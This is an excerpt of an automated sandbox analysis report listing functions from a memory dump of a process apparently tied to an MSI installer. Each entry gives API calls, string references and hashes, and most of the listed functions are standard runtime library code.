@Tt, xrefs: 006FAB73, 006FAAFF
Tt, xrefs: 006FABB4, 006FABF9, 006FAB0C, 006FAC38

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: FreeLocal
String ID: @Tt$@Tt$Tt
API String ID: 2826327444-4056915289
Opcode ID: 72c1e5c72587e7c922fd9a48650c8761058ad0b1bf4a81763fc84d297f8fb966
Instruction ID: 76307c7881997836054a362c01b4d9758dae676b8b83d91377724c371184341d
Opcode Fuzzy Hash: 72c1e5c72587e7c922fd9a48650c8761058ad0b1bf4a81763fc84d297f8fb966
Instruction Fuzzy Hash: 88E16BB1A0024DDFDF14CFA8C984AEEBBB6FF48300F144169E919AB351D770A945CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00731D9B Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(DBD9785B,?,00000000,?), ref: 00731DFE

Part of subcall function 0072A9BB: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00726F5E,?,00000000,-00000008), ref: 0072AA67

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00732059
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 007320A1
GetLastError.KERNEL32 ref: 00732144

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 206b9d19c8550aaa38a6ab534ff0b77a60dbe2c553402ac51b8d0dc87d860648
Instruction ID: b3edd135077f4710c0c696f56b88a9ba9c388b3fd4a7caacf01f8fa076bf223c
Opcode Fuzzy Hash: 206b9d19c8550aaa38a6ab534ff0b77a60dbe2c553402ac51b8d0dc87d860648
Instruction Fuzzy Hash: BAD178B5D00258DFDB15CFA8D8809EDBBB5FF09310F18852AE915EB352E734A946CB50

Uniqueness

Uniqueness Score: -1.00%

Function 007224E8 Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1ca4943b62fef7fbe0cc6aae0b9348fc2b029d89691edbd16c3b0ebcb8209e6b
Instruction ID: 8503db5033db775004cc21645da991f14a4fe72a9be0a560998c791449fc44c4
Opcode Fuzzy Hash: 1ca4943b62fef7fbe0cc6aae0b9348fc2b029d89691edbd16c3b0ebcb8209e6b
Instruction Fuzzy Hash: F3210E72604225FF9B24AF66EC65C6A77A8FF44360700C954F82587252EB38ED62D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 006FCCE0 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000,DBD9785B), ref: 006FCD1C
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 006FCD3C
WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 006FCD6D
CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 006FCD86

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: File$CloseCreateHandlePointerWrite
String ID:
API String ID: 3604237281-0
Opcode ID: 87fe3a3e8f0b41448e010f985a413227fac6a9f3b2e57bcccb9cac1aa0d016a8
Instruction ID: 09f49a01911d67b57d2fa44969aa9167382751a752cb476ab5a994cd663246ee
Opcode Fuzzy Hash: 87fe3a3e8f0b41448e010f985a413227fac6a9f3b2e57bcccb9cac1aa0d016a8
Instruction Fuzzy Hash: E221B4B4941718EBE7248F54DD46FAEBBB8EB05B24F104569F600A72D0D7B85A04C7E4

Uniqueness

Uniqueness Score: -1.00%

Function 00733686 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,00733053,?,00000001,?,?,?,00732198,?,?,00000000), ref: 0073369D
GetLastError.KERNEL32(?,00733053,?,00000001,?,?,?,00732198,?,?,00000000,?,?,?,0073271F,?), ref: 007336A9

Part of subcall function 0073366F: CloseHandle.KERNEL32(FFFFFFFE,007336B9,?,00733053,?,00000001,?,?,?,00732198,?,?,00000000,?,?), ref: 0073367F

___initconout.LIBCMT ref: 007336B9

Part of subcall function 00733631: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00733660,00733040,?,?,00732198,?,?,00000000,?), ref: 00733644

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,00733053,?,00000001,?,?,?,00732198,?,?,00000000,?), ref: 007336CE

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: ac9d547ab0901455231032c740ff3065acf1c277f2cb25cd89206ff49b76414c
Instruction ID: 0f60052905d7fc727c5dc3b9ee6738b52271cc7678332a8c728c68a1c8eed465
Opcode Fuzzy Hash: ac9d547ab0901455231032c740ff3065acf1c277f2cb25cd89206ff49b76414c
Instruction Fuzzy Hash: 0DF01C37504118FFDF762F95DC099893F66FB093A1F008050FE199A231C73A8920EB98

Uniqueness

Uniqueness Score: -1.00%

Function 007086C7 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 248COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 007086CE
ctype.LIBCPMT ref: 0070877B

Strings

2q, xrefs: 007087B5

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: H_prolog3_ctype
String ID: 2q
API String ID: 2548254987-950290719
Opcode ID: ebd923d7a1711fa6028c3c964977fa6cb1247e09656759fdf5582804c3926419
Instruction ID: caf9066c03aefbe34690304373c3df962b4c1440f626cb48af855c69c14f0af4
Opcode Fuzzy Hash: ebd923d7a1711fa6028c3c964977fa6cb1247e09656759fdf5582804c3926419
Instruction Fuzzy Hash: 75A18E71810209DFDF54DF94C984AEEBBF9FF48310F144229E844A7292DB38AE56CB61

Uniqueness

Uniqueness Score: -1.00%

Function 006FF13C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 246COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 006FF143
ctype.LIBCPMT ref: 006FF1F0

Strings

2q, xrefs: 006FF22A

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: H_prolog3_ctype
String ID: 2q
API String ID: 2548254987-950290719
Opcode ID: 16da99d36c8dbeec19eb780532619e6e1c0758a5e902da7eea9ea7fa23f6076d
Instruction ID: 0eb710445b708c12c89c762572aba2da1edf9a82c49fbd56fc0a080ba61846eb
Opcode Fuzzy Hash: 16da99d36c8dbeec19eb780532619e6e1c0758a5e902da7eea9ea7fa23f6076d
Instruction Fuzzy Hash: 04A1467590020DDFDF24DFA8C981AFEBBBAFF08310F140069E915A7251D770AA46CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00721A6D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMONLIBRARYCODE

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00721AFD

Strings

pow, xrefs: 00721AD5, 00721AF2

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: bb41dc4323e95e525ffca86adb27229b577276279bcdf953eedaf436e3d04fa7
Instruction ID: 226b2571295d705d490eb8e0b6b94d88f6f059a92f4f911462265339630ffde4
Opcode Fuzzy Hash: bb41dc4323e95e525ffca86adb27229b577276279bcdf953eedaf436e3d04fa7
Instruction Fuzzy Hash: B1516A61A09221EBDB15BB14FD0137A77F4FB60701F70CD68E0D1822AAEA3D8C959B47

Uniqueness

Uniqueness Score: -1.00%

Function 006FD41C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 186COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 006FD423
std::locale::_Init.LIBCPMT ref: 006FD465

Strings

2q, xrefs: 006FD54F, 006FD580

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: H_prolog3_Initstd::locale::_
String ID: 2q
API String ID: 3382595777-950290719
Opcode ID: cd133ce71d0e00c953fffcc3514ea03438c074db386eb5498c75c811ffa23673
Instruction ID: 5ee05d5dc2fd1035b8bc48b0cd1edb7e562566db2ccd4d714859dc92c8ef57fe
Opcode Fuzzy Hash: cd133ce71d0e00c953fffcc3514ea03438c074db386eb5498c75c811ffa23673
Instruction Fuzzy Hash: 7B715A34D0529C9BDF15DFA4D4506FDBBB3AF59314F284099E9817B382DB30A946CB60

Uniqueness

Uniqueness Score: -1.00%

Function 007015FB Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 186COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00701602
std::locale::_Init.LIBCPMT ref: 00701644

Strings

2q, xrefs: 00701732, 0070175F

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: H_prolog3_Initstd::locale::_
String ID: 2q
API String ID: 3382595777-950290719
Opcode ID: 186e93dd97688bcb6668572a5739684701f3ee6b551e26924569deb47b1910bf
Instruction ID: 6c1bf444ccffd97803325ed929bfac173340681c3a32d1c95dd8cfbfcd72e64a
Opcode Fuzzy Hash: 186e93dd97688bcb6668572a5739684701f3ee6b551e26924569deb47b1910bf
Instruction Fuzzy Hash: BA71CC34E04258DBCF14CFA4C8906EDBBF2AF49310FA85199E8817B382DB395D42CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0070180A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00701811
std::locale::_Init.LIBCPMT ref: 00701859

Strings

2q, xrefs: 0070194A, 0070197A

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: H_prolog3_Initstd::locale::_
String ID: 2q
API String ID: 3382595777-950290719
Opcode ID: f2d63c252aeeb8f3d4ef03952d5fe5ac96912a8801e3870eb9110b4206664b9b
Instruction ID: a45f5f5e931ffb57ceb322841400b19ca0818323a47c1097ac4e953f2a285c76
Opcode Fuzzy Hash: f2d63c252aeeb8f3d4ef03952d5fe5ac96912a8801e3870eb9110b4206664b9b
Instruction Fuzzy Hash: 83715D34D04258DBDF14DF94D4906FDBBF2AF58710F948259E882A72C1DB386D82CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00701A26 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00701A2D
std::locale::_Init.LIBCPMT ref: 00701A75

Strings

2q, xrefs: 00701B66, 00701B96

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: H_prolog3_Initstd::locale::_
String ID: 2q
API String ID: 3382595777-950290719
Opcode ID: bcbd2bd921fb5bfd0852aea1e86f1e95c61c5f02e51ca39a3495aefca0e8a2c0
Instruction ID: 13330271d24dc0a3c170305809f1a76f63ce8b7116b047d6cef4f892bc06db94
Opcode Fuzzy Hash: bcbd2bd921fb5bfd0852aea1e86f1e95c61c5f02e51ca39a3495aefca0e8a2c0
Instruction Fuzzy Hash: BC718C74A05258DBCF18DF94D490AFDBBF2BF58310F948259E842A72C1EB385D82CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00711E70 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 182COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00711FD1

Strings

0123456789abcdefghijklmnopqrstuvwxyz, xrefs: 00711F2F, 00711F66, 00711F6B
-, xrefs: 00711FFF

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: __aulldiv
String ID: -$0123456789abcdefghijklmnopqrstuvwxyz
API String ID: 3732870572-1956417402
Opcode ID: 26aca567ffa4e2e9a6479253702fed2e599bfcef21373e4ada2d6de08c00d430
Instruction ID: fe6d57685ea7bb08a775d9b5f7352dbf848715934809136ec6e8626b70d18a3f
Opcode Fuzzy Hash: 26aca567ffa4e2e9a6479253702fed2e599bfcef21373e4ada2d6de08c00d430
Instruction Fuzzy Hash: 91510570B052859ADF258EAC84817FEBBFA6F09341F94415AEA91DB2C1D37C89C2CB51

Uniqueness

Uniqueness Score: -1.00%

Function 006FBD90 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 167COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 006FBF6E

Strings

false, xrefs: 006FBE95
true, xrefs: 006FBEAB

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID: false$true
API String ID: 118556049-2658103896
Opcode ID: 2d2e8a07f05f22437fef06ae9872f7c64dd63c88ef78fad284e2b61631f12afe
Instruction ID: a0b19511660564163f432b1d9cc98d62f752eadbc0e2667c1e00db8511ce1a9c
Opcode Fuzzy Hash: 2d2e8a07f05f22437fef06ae9872f7c64dd63c88ef78fad284e2b61631f12afe
Instruction Fuzzy Hash: E351B1B1D00748DFDB10DFA4C945BEEB7B8FF05304F14826AE905AB281E774AA85CB91

Uniqueness

Uniqueness Score: -1.00%

Function 006F70A0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 149COMMON

Download Yara Rule

Strings

\\?\UNC\, xrefs: 006F7173, 006F71CE
\\?\, xrefs: 006F71E3, 006F7210

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID:
String ID: \\?\$\\?\UNC\
API String ID: 0-3019864461
Opcode ID: 1d80f5cc9649fba7b9d4e3d77eb43a9ee387d377c2e3bc477a4b004e870f3afc
Instruction ID: 3eaba7bb40e995e74a35ab202dcfe7ebeae63ca67426a7dc66b8e01eb13730e0
Opcode Fuzzy Hash: 1d80f5cc9649fba7b9d4e3d77eb43a9ee387d377c2e3bc477a4b004e870f3afc
Instruction Fuzzy Hash: 3D51E1B0A0420CDBDB14CF64C885BFEB7B6FF95344F14451DE501AB281DBB96988CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00716059 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0071607E

Strings

MOC, xrefs: 00716090
RCC, xrefs: 00716098

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: b2019e25464d00618688eecd6aab007d55d54eeab6d1d252240f4b3474b279bd
Instruction ID: 72820be9c94e660cbfeea81658f04eec4d607264ca7c8f0ef204cc10f6c967b3
Opcode Fuzzy Hash: b2019e25464d00618688eecd6aab007d55d54eeab6d1d252240f4b3474b279bd
Instruction Fuzzy Hash: 4A413872900209EFCF15DF98CC81EEEBBB5BF48304F148199F90867292D3799A91DB51

Uniqueness

Uniqueness Score: -1.00%

Function 0070DF8F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 0070DF96
__cftoe.LIBCMT ref: 0070E01A

Strings

!%x, xrefs: 0070DFA7

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: H_prolog3___cftoe
String ID: !%x
API String ID: 855520168-1893981228
Opcode ID: d4d0613fafad6d6b337bf55c0dfab54c9122e08ebc50cdb6f6b729a99d89ec8d
Instruction ID: 9740124f919bcc46dc1b33e894e586ed6be9511622c7c9063319019aef7407f6
Opcode Fuzzy Hash: d4d0613fafad6d6b337bf55c0dfab54c9122e08ebc50cdb6f6b729a99d89ec8d
Instruction Fuzzy Hash: E7316B71D0020DEBDF04DF94E885AEEB7B6FF08304F204519F505A7292E779AA45CB64

Uniqueness

Uniqueness Score: -1.00%

Function 007119FA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00711A01
__cftoe.LIBCMT ref: 00711A7F

Strings

!%x, xrefs: 00711A15

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: H_prolog3___cftoe
String ID: !%x
API String ID: 855520168-1893981228
Opcode ID: 0873877874207f364064c77fde6c0c3e0378f798e27f24ab983c70e5ef5971b8
Instruction ID: 0a0c451498a8c6c8cad53df987765d0de1261b9f1d3c296e89f4673ea75ae8b8
Opcode Fuzzy Hash: 0873877874207f364064c77fde6c0c3e0378f798e27f24ab983c70e5ef5971b8
Instruction Fuzzy Hash: 60319F31D0525DEFDF00DF98E841AEEBBB5EF05300F10801AF944AB282D7799A85CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 006F5F40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

ConvertSidToStringSidW.ADVAPI32(?,00000000), ref: 006F5F86
LocalFree.KERNEL32(00000000,Invalid SID,0000000B,?,00000000,DBD9785B), ref: 006F5FF6

Strings

Invalid SID, xrefs: 006F5FD4

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154513154.0000000000737000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154535612.000000000074C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2154547525.0000000000750000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6f0000_MSI3B6A.jbxd

Similarity

API ID: ConvertFreeLocalString
String ID: Invalid SID
API String ID: 3201929900-130637731
Opcode ID: 6bb7eb8c82276950aabf3a71c7cce253b631514c5faeb9fd092e776961059408
Instruction ID: 487e643e3a5b596b0fcb045ad4a3f15627ba2147bddaf9615dd51467bcbd8c58
Opcode Fuzzy Hash: 6bb7eb8c82276950aabf3a71c7cce253b631514c5faeb9fd092e776961059408
Instruction Fuzzy Hash: B621AEB4A046099BDB14CF58C855BBFBBF9FF44714F10451EE502A7780D7B96A048BD0

Uniqueness

Uniqueness Score: -1.00%

Function 006F9070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 006F909B
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 006F90FE

Strings

bad locale name, xrefs: 006F9121

Memory Dump Source

Source File: 00000004.00000002.2154484728.00000000006F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 006F0000, based on PE: true

Associated: 00000004.00000002.2154469380.00000000006F0000.00000002.00000001.01000000.00000006.sdmpDownload File
